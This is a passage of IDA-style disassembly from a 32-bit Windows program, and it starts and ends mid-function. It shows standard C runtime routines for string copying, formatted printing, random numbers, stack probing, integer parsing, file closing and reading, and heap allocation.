mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_414364
mov ebx, ecx
shr ecx, 2
jnz short loc_4143BE
jmp short loc_414386
; ---------------------------------------------------------------------------
loc_414364: ; CODE XREF: sub_4142E0+79�j
; sub_4142E0+9D�j
mov dl, [esi]
add esi, 1
test dl, dl
jz short loc_4143AA
mov [edi], dl
add edi, 1
sub ecx, 1
jz short loc_4143A0
test esi, 3
jnz short loc_414364
mov ebx, ecx
shr ecx, 2
jnz short loc_4143BE
loc_414386: ; CODE XREF: sub_4142E0+82�j
; sub_4142E0+DC�j
mov ecx, ebx
and ecx, 3
jz short loc_4143A0
loc_41438D: ; CODE XREF: sub_4142E0+BE�j
mov dl, [esi]
add esi, 1
mov [edi], dl
add edi, 1
test dl, dl
jz short loc_4143A2
sub ecx, 1
jnz short loc_41438D
loc_4143A0: ; CODE XREF: sub_4142E0+95�j
; sub_4142E0+AB�j
mov [edi], cl
loc_4143A2: ; CODE XREF: sub_4142E0+B9�j
pop ebx
pop esi
loc_4143A4: ; CODE XREF: sub_4142E0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4143AA: ; CODE XREF: sub_4142E0+8B�j
; sub_4142E0+FA�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4143B4: ; CODE XREF: sub_4142E0+F6�j
; sub_4142E0+10E�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_414386
loc_4143BE: ; CODE XREF: sub_4142E0+80�j
; sub_4142E0+A4�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_4143B4
test dl, dl
jz short loc_4143AA
test dh, dh
jz short loc_41440A
test edx, 0FF0000h
jz short loc_4143FA
test edx, 0FF000000h
jnz short loc_4143B4
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_4143FA: ; CODE XREF: sub_4142E0+106�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41440A: ; CODE XREF: sub_4142E0+FE�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4142E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414415 proc near ; CODE XREF: sub_401000+19�p
; sub_401000+48�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_416492
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_414467
dec [ebp+var_1C]
js short loc_41445A
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_414467
; ---------------------------------------------------------------------------
loc_41445A: ; CODE XREF: sub_414415+3B�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_4162EB
pop ecx
pop ecx
loc_414467: ; CODE XREF: sub_414415+36�j
; sub_414415+43�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_414415 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414470 proc near ; CODE XREF: sub_401141+2CF�p
; sub_4089DC+3EF3�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_414497
xor eax, eax
jmp short loc_414499
; ---------------------------------------------------------------------------
loc_414497: ; CODE XREF: sub_414470+21�j
mov eax, edi
loc_414499: ; CODE XREF: sub_414470+25�j
cld
pop edi
leave
retn
sub_414470 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4144A0 proc near ; CODE XREF: sub_401141+6E�p
; sub_401141+A2�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_41453F
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_4144CC
shr ecx, 2
jnz loc_41454F
jmp short loc_4144F3
; ---------------------------------------------------------------------------
loc_4144CC: ; CODE XREF: sub_4144A0+1F�j
; sub_4144A0+45�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
sub ecx, 1
jz short loc_414506
test al, al
jz short loc_41450E
test esi, 3
jnz short loc_4144CC
mov ebx, ecx
shr ecx, 2
jnz short loc_41454F
loc_4144EE: ; CODE XREF: sub_4144A0+AD�j
and ebx, 3
jz short loc_414506
loc_4144F3: ; CODE XREF: sub_4144A0+2A�j
; sub_4144A0+64�j
mov al, [esi]
add esi, 1
mov [edi], al
add edi, 1
test al, al
jz short loc_414538
sub ebx, 1
jnz short loc_4144F3
loc_414506: ; CODE XREF: sub_4144A0+39�j
; sub_4144A0+51�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41450E: ; CODE XREF: sub_4144A0+3D�j
test edi, 3
jz short loc_41452C
loc_414516: ; CODE XREF: sub_4144A0+8A�j
mov [edi], al
add edi, 1
sub ecx, 1
jz loc_4145BC
test edi, 3
jnz short loc_414516
loc_41452C: ; CODE XREF: sub_4144A0+74�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4145A7
loc_414533: ; CODE XREF: sub_4144A0+9B�j
; sub_4144A0+116�j
mov [edi], al
add edi, 1
loc_414538: ; CODE XREF: sub_4144A0+5F�j
sub ebx, 1
jnz short loc_414533
pop ebx
pop esi
loc_41453F: ; CODE XREF: sub_4144A0+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_414545: ; CODE XREF: sub_4144A0+C7�j
; sub_4144A0+DF�j
mov [edi], edx
add edi, 4
sub ecx, 1
jz short loc_4144EE
loc_41454F: ; CODE XREF: sub_4144A0+24�j
; sub_4144A0+4C�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_414545
test dl, dl
jz short loc_414599
test dh, dh
jz short loc_41458F
test edx, 0FF0000h
jz short loc_414585
test edx, 0FF000000h
jnz short loc_414545
mov [edi], edx
jmp short loc_41459D
; ---------------------------------------------------------------------------
loc_414585: ; CODE XREF: sub_4144A0+D7�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_41459D
; ---------------------------------------------------------------------------
loc_41458F: ; CODE XREF: sub_4144A0+CF�j
and edx, 0FFh
mov [edi], edx
jmp short loc_41459D
; ---------------------------------------------------------------------------
loc_414599: ; CODE XREF: sub_4144A0+CB�j
xor edx, edx
mov [edi], edx
loc_41459D: ; CODE XREF: sub_4144A0+E3�j
; sub_4144A0+ED�j ...
add edi, 4
xor eax, eax
sub ecx, 1
jz short loc_4145B3
loc_4145A7: ; CODE XREF: sub_4144A0+91�j
xor eax, eax
loc_4145A9: ; CODE XREF: sub_4144A0+111�j
mov [edi], eax
add edi, 4
sub ecx, 1
jnz short loc_4145A9
loc_4145B3: ; CODE XREF: sub_4144A0+105�j
and ebx, 3
jnz loc_414533
loc_4145BC: ; CODE XREF: sub_4144A0+7E�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_4144A0 endp
; =============== S U B R O U T I N E =======================================
sub_4145C4 proc near ; CODE XREF: sub_401967+39�p
; sub_402500+2E�p ...
arg_0 = dword ptr 4
call sub_416C45
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_4145C4 endp
; =============== S U B R O U T I N E =======================================
sub_4145D1 proc near ; CODE XREF: sub_4017F1+57�p
; sub_4017F1:loc_401854�p ...
call sub_416C45
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_4145D1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4145F3 proc near ; CODE XREF: sub_4017F1+4A�p
; sub_403BFF+23C�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push eax
mov [ebp+var_14], 49h
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_4177F0
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
call sub_416D3B
add esp, 10h
leave
retn
sub_4145F3 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_414630 proc near ; CODE XREF: sub_40398A+8�p
; sub_404AC0+A�p ...
arg_0 = byte ptr 4
cmp eax, 1000h
jnb short loc_414645
neg eax
add eax, esp
add eax, 4
test [eax], eax
xchg eax, esp
mov eax, [eax]
push eax
retn
; ---------------------------------------------------------------------------
loc_414645: ; CODE XREF: sub_414630+5�j
push ecx
lea ecx, [esp+4+arg_0]
loc_41464A: ; CODE XREF: sub_414630+2C�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_41464A
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_414630 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41466D proc near ; CODE XREF: sub_401E87+46�p
; sub_401EFF+67�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov [ebp+var_1C], eax
push edi
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_416492
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_4146BE
dec [ebp+var_1C]
js short loc_4146B1
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_4146BE
; ---------------------------------------------------------------------------
loc_4146B1: ; CODE XREF: sub_41466D+3A�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_4162EB
pop ecx
pop ecx
loc_4146BE: ; CODE XREF: sub_41466D+35�j
; sub_41466D+42�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_41466D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4146C4 proc near ; CODE XREF: sub_401F73+19�p
; sub_405674+1C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
push edi
push [ebp+arg_C]
mov [ebp+var_1C], eax
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_416492
add esp, 0Ch
test esi, esi
mov edi, eax
jz short loc_414714
dec [ebp+var_1C]
js short loc_414707
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_414714
; ---------------------------------------------------------------------------
loc_414707: ; CODE XREF: sub_4146C4+39�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_4162EB
pop ecx
pop ecx
loc_414714: ; CODE XREF: sub_4146C4+34�j
; sub_4146C4+41�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_4146C4 endp
; =============== S U B R O U T I N E =======================================
sub_41471A proc near ; CODE XREF: sub_4147A2�j
; sub_41DD87+36�p
arg_0 = dword ptr 4
push esi
push edi
call sub_416C45
mov edi, [eax+64h]
cmp edi, off_42D84C
jz short loc_414733
call sub_417A7E
mov edi, eax
loc_414733: ; CODE XREF: sub_41471A+10�j
mov esi, [esp+8+arg_0]
loc_414737: ; CODE XREF: sub_41471A+43�j
cmp dword ptr [edi+28h], 1
movzx eax, byte ptr [esi]
jle short loc_41474E
push 8
push eax
push edi
call sub_41787B
add esp, 0Ch
jmp short loc_414758
; ---------------------------------------------------------------------------
loc_41474E: ; CODE XREF: sub_41471A+24�j
mov ecx, [edi+48h]
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
loc_414758: ; CODE XREF: sub_41471A+32�j
test eax, eax
jz short loc_41475F
inc esi
jmp short loc_414737
; ---------------------------------------------------------------------------
loc_41475F: ; CODE XREF: sub_41471A+40�j
movzx ecx, byte ptr [esi]
inc esi
cmp ecx, 2Dh
mov edx, ecx
jz short loc_41476F
cmp ecx, 2Bh
jnz short loc_414773
loc_41476F: ; CODE XREF: sub_41471A+4E�j
movzx ecx, byte ptr [esi]
inc esi
loc_414773: ; CODE XREF: sub_41471A+53�j
xor eax, eax
loc_414775: ; CODE XREF: sub_41471A+7C�j
cmp ecx, 30h
jl short loc_414784
cmp ecx, 39h
jg short loc_414784
sub ecx, 30h
jmp short loc_414787
; ---------------------------------------------------------------------------
loc_414784: ; CODE XREF: sub_41471A+5E�j
; sub_41471A+63�j
or ecx, 0FFFFFFFFh
loc_414787: ; CODE XREF: sub_41471A+68�j
cmp ecx, 0FFFFFFFFh
jz short loc_414798
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2]
movzx ecx, byte ptr [esi]
inc esi
jmp short loc_414775
; ---------------------------------------------------------------------------
loc_414798: ; CODE XREF: sub_41471A+70�j
cmp edx, 2Dh
pop edi
pop esi
jnz short locret_4147A1
neg eax
locret_4147A1: ; CODE XREF: sub_41471A+83�j
retn
sub_41471A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4147A2 proc near ; CODE XREF: sub_402011+63�p
; sub_4024A4+12�p ...
jmp sub_41471A
sub_4147A2 endp
; =============== S U B R O U T I N E =======================================
sub_4147A7 proc near ; CODE XREF: sub_4147F3+32�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
test byte ptr [esi+0Ch], 83h
jz short loc_4147EA
push esi
call sub_417C02
push esi
mov edi, eax
call sub_417BD7
push dword ptr [esi+10h]
call sub_417B3C
add esp, 0Ch
test eax, eax
jge short loc_4147D8
or edi, 0FFFFFFFFh
jmp short loc_4147EA
; ---------------------------------------------------------------------------
loc_4147D8: ; CODE XREF: sub_4147A7+2A�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_4147EA
push eax
call sub_414844
and dword ptr [esi+1Ch], 0
pop ecx
loc_4147EA: ; CODE XREF: sub_4147A7+D�j
; sub_4147A7+2F�j ...
and dword ptr [esi+0Ch], 0
mov eax, edi
pop edi
pop esi
retn
sub_4147A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4147F3 proc near ; CODE XREF: sub_403B6D+74�p
; sub_4089DC+37DA�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset stru_428D08
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
mov esi, [ebp+arg_0]
test byte ptr [esi+0Ch], 40h
jz short loc_414819
and dword ptr [esi+0Ch], 0
loc_414810: ; CODE XREF: sub_4147F3+44�j
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_414819: ; CODE XREF: sub_4147F3+17�j
push esi
call sub_417E28
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_4147A7
pop ecx
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41483C
jmp short loc_414810
sub_4147F3 endp
; =============== S U B R O U T I N E =======================================
sub_414839 proc near ; DATA XREF: .rdata:stru_428D08�o
mov esi, [ebp+8]
sub_414839 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41483C proc near ; CODE XREF: sub_4147F3+3F�p
push esi
call sub_417E7A
pop ecx
retn
sub_41483C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414844 proc near ; CODE XREF: sub_402DDF+74�p
; sub_406650+CC�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004148A0 SIZE 00000015 BYTES
push 0Ch
push offset stru_428D18
call __SEH_prolog
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_4148AF
cmp dword_47C9A0, 3
jnz short loc_4148A0
push 4
call sub_4180B5
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41812E
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_414883
push esi
push eax
call sub_418159
pop ecx
pop ecx
loc_414883: ; CODE XREF: sub_414844+34�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_414897
cmp [ebp+var_1C], 0
jnz short loc_4148AF
push [ebp+arg_0]
jmp short loc_4148A1
sub_414844 endp
; =============== S U B R O U T I N E =======================================
sub_414897 proc near ; CODE XREF: sub_414844+43�p
; DATA XREF: .rdata:stru_428D18�o
push 4
call sub_418021
pop ecx
retn
sub_414897 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_414844
loc_4148A0: ; CODE XREF: sub_414844+1A�j
push esi
loc_4148A1: ; CODE XREF: sub_414844+51�j
push 0
push dword_47C99C
call ds:dword_420058 ; RtlFreeHeap
loc_4148AF: ; CODE XREF: sub_414844+11�j
; sub_414844+4C�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_414844
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4148B5 proc near ; CODE XREF: sub_41499E+25�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
test edi, edi
mov ecx, edi
mov [ebp+var_8], edi
mov [ebp+arg_0], ecx
jnz short loc_4148D9
xor eax, eax
jmp loc_414984
; ---------------------------------------------------------------------------
loc_4148D9: ; CODE XREF: sub_4148B5+1B�j
push esi
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_4148ED
mov eax, [esi+18h]
mov [ebp+var_4], eax
jmp short loc_4148F9
; ---------------------------------------------------------------------------
loc_4148ED: ; CODE XREF: sub_4148B5+2E�j
mov [ebp+var_4], 1000h
jmp short loc_4148F9
; ---------------------------------------------------------------------------
loc_4148F6: ; CODE XREF: sub_4148B5+C5�j
mov ecx, [ebp+arg_0]
loc_4148F9: ; CODE XREF: sub_4148B5+36�j
; sub_4148B5+3F�j
test word ptr [esi+0Ch], 10Ch
jz short loc_41492B
mov eax, [esi+4]
test eax, eax
jz short loc_41492B
cmp ecx, eax
mov edi, ecx
jb short loc_414910
mov edi, eax
loc_414910: ; CODE XREF: sub_4148B5+57�j
push edi
push dword ptr [esi]
push ebx
call sub_418F70
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_8]
jmp short loc_414976
; ---------------------------------------------------------------------------
loc_41492B: ; CODE XREF: sub_4148B5+4A�j
; sub_4148B5+51�j
cmp ecx, [ebp+var_4]
jb short loc_41495E
cmp [ebp+var_4], 0
mov eax, ecx
jz short loc_414941
xor edx, edx
div [ebp+var_4]
mov eax, ecx
sub eax, edx
loc_414941: ; CODE XREF: sub_4148B5+81�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_418EB7
add esp, 0Ch
test eax, eax
jz short loc_414988
cmp eax, 0FFFFFFFFh
jz short loc_414998
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_414976
; ---------------------------------------------------------------------------
loc_41495E: ; CODE XREF: sub_4148B5+79�j
push esi
call sub_418C09
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41498C
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+var_4], eax
loc_414976: ; CODE XREF: sub_4148B5+74�j
; sub_4148B5+A7�j
cmp [ebp+arg_0], 0
jnz loc_4148F6
mov eax, [ebp+arg_8]
loc_414983: ; CODE XREF: sub_4148B5+E1�j
pop esi
loc_414984: ; CODE XREF: sub_4148B5+1F�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_414988: ; CODE XREF: sub_4148B5+9B�j
or dword ptr [esi+0Ch], 10h
loc_41498C: ; CODE XREF: sub_4148B5+B3�j
; sub_4148B5+E7�j
mov eax, edi
sub eax, [ebp+arg_0]
xor edx, edx
div [ebp+arg_4]
jmp short loc_414983
; ---------------------------------------------------------------------------
loc_414998: ; CODE XREF: sub_4148B5+A0�j
or dword ptr [esi+0Ch], 20h
jmp short loc_41498C
sub_4148B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41499E proc near ; CODE XREF: sub_403B6D+47�p
; sub_411DD2+2F2�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 0Ch
push offset stru_428D28
call __SEH_prolog
push [ebp+arg_C]
call sub_417E28
pop ecx
and [ebp+ms_exc.disabled], 0
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4148B5
add esp, 10h
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4149E0
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41499E endp
; =============== S U B R O U T I N E =======================================
sub_4149E0 proc near ; CODE XREF: sub_41499E+34�p
; DATA XREF: .rdata:stru_428D28�o
push dword ptr [ebp+14h]
call sub_417E7A
pop ecx
retn
sub_4149E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4149EA proc near ; CODE XREF: sub_41AFFE+34�p
; sub_41AFFE+49�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00414B5B SIZE 0000003C BYTES
push 14h
push offset stru_428D38
call __SEH_prolog
mov edi, [ebp+arg_0]
xor ebx, ebx
cmp edi, ebx
jnz short loc_414A0D
push [ebp+arg_4]
call sub_414CAD
pop ecx
jmp loc_414B91
; ---------------------------------------------------------------------------
loc_414A0D: ; CODE XREF: sub_4149EA+13�j
mov esi, [ebp+arg_4]
cmp esi, ebx
jnz short loc_414A20
push edi
call sub_414844
pop ecx
jmp loc_414B8F
; ---------------------------------------------------------------------------
loc_414A20: ; CODE XREF: sub_4149EA+28�j
cmp dword_47C9A0, 3
jnz loc_414B5B
loc_414A2D: ; CODE XREF: sub_4149EA+158�j
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja loc_414B2A
push 4
call sub_4180B5
pop ecx
mov [ebp+ms_exc.disabled], ebx
push edi
call sub_41812E
pop ecx
mov [ebp+var_20], eax
cmp eax, ebx
jz loc_414AFA
cmp esi, dword_47C98C
ja short loc_414AAA
push esi
push edi
push eax
call sub_41862E
add esp, 0Ch
test eax, eax
jz short loc_414A72
mov [ebp+var_1C], edi
jmp short loc_414AAA
; ---------------------------------------------------------------------------
loc_414A72: ; CODE XREF: sub_4149EA+81�j
push esi
call sub_41890D
pop ecx
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_414AAA
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_414A8D
mov eax, esi
loc_414A8D: ; CODE XREF: sub_4149EA+9F�j
push eax
push edi
push [ebp+var_1C]
call sub_418F70
push edi
call sub_41812E
mov [ebp+var_20], eax
push edi
push eax
call sub_418159
add esp, 18h
loc_414AAA: ; CODE XREF: sub_4149EA+72�j
; sub_4149EA+86�j ...
cmp [ebp+var_1C], ebx
jnz short loc_414AFA
cmp esi, ebx
jnz short loc_414AB9
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_414AB9: ; CODE XREF: sub_4149EA+C7�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push dword_47C99C
call ds:dword_42005C ; RtlAllocateHeap
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_414AFA
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_414AE4
mov eax, esi
loc_414AE4: ; CODE XREF: sub_4149EA+F6�j
push eax
push edi
push [ebp+var_1C]
call sub_418F70
push edi
push [ebp+var_20]
call sub_418159
add esp, 14h
loc_414AFA: ; CODE XREF: sub_4149EA+66�j
; sub_4149EA+C3�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_414B52
cmp [ebp+var_20], ebx
jnz short loc_414B2A
cmp esi, ebx
jnz short loc_414B0F
xor esi, esi
inc esi
loc_414B0F: ; CODE XREF: sub_4149EA+120�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push ebx
push dword_47C99C
call ds:dword_420158 ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_414B2A: ; CODE XREF: sub_4149EA+49�j
; sub_4149EA+11C�j
mov eax, [ebp+var_1C]
cmp eax, ebx
jnz short loc_414B91
cmp dword_47C37C, ebx
jz short loc_414B91
push esi
call sub_4192AD
pop ecx
test eax, eax
jnz loc_414A2D
jmp short loc_414B8F
sub_4149EA endp
; =============== S U B R O U T I N E =======================================
sub_414B4A proc near ; DATA XREF: .rdata:stru_428D38�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
sub_414B4A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_414B52 proc near ; CODE XREF: sub_4149EA+114�p
push 4
call sub_418021
pop ecx
retn
sub_414B52 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4149EA
loc_414B5B: ; CODE XREF: sub_4149EA+3D�j
; sub_4149EA+1A3�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_414B78
cmp esi, ebx
jnz short loc_414B69
xor esi, esi
inc esi
loc_414B69: ; CODE XREF: sub_4149EA+17A�j
push esi
push edi
push ebx
push dword_47C99C
call ds:dword_420158 ; RtlReAllocateHeap
loc_414B78: ; CODE XREF: sub_4149EA+176�j
cmp eax, ebx
jnz short loc_414B91
cmp dword_47C37C, ebx
jz short loc_414B91
push esi
call sub_4192AD
pop ecx
test eax, eax
jnz short loc_414B5B
loc_414B8F: ; CODE XREF: sub_4149EA+31�j
; sub_4149EA+15E�j
xor eax, eax
loc_414B91: ; CODE XREF: sub_4149EA+1E�j
; sub_4149EA+145�j ...
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_4149EA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414B97 proc near ; CODE XREF: sub_414BF3+A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 10h
push offset stru_428D48
call __SEH_prolog
call sub_4194B5
mov [ebp+var_1C], eax
test eax, eax
jnz short loc_414BBE
call sub_419430
mov dword ptr [eax], 18h
xor eax, eax
jmp short loc_414BE3
; ---------------------------------------------------------------------------
loc_414BBE: ; CODE XREF: sub_414B97+16�j
and [ebp+ms_exc.disabled], 0
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4192C8
add esp, 10h
mov [ebp+var_20], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_414BE9
mov eax, [ebp+var_20]
loc_414BE3: ; CODE XREF: sub_414B97+25�j
call __SEH_epilog
retn
sub_414B97 endp
; =============== S U B R O U T I N E =======================================
sub_414BE9 proc near ; CODE XREF: sub_414B97+44�p
; DATA XREF: .rdata:stru_428D48�o
push dword ptr [ebp-1Ch]
call sub_417E7A
pop ecx
retn
sub_414BE9 endp
; =============== S U B R O U T I N E =======================================
sub_414BF3 proc near ; CODE XREF: sub_403B6D+2A�p
; sub_4089DC+3785�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
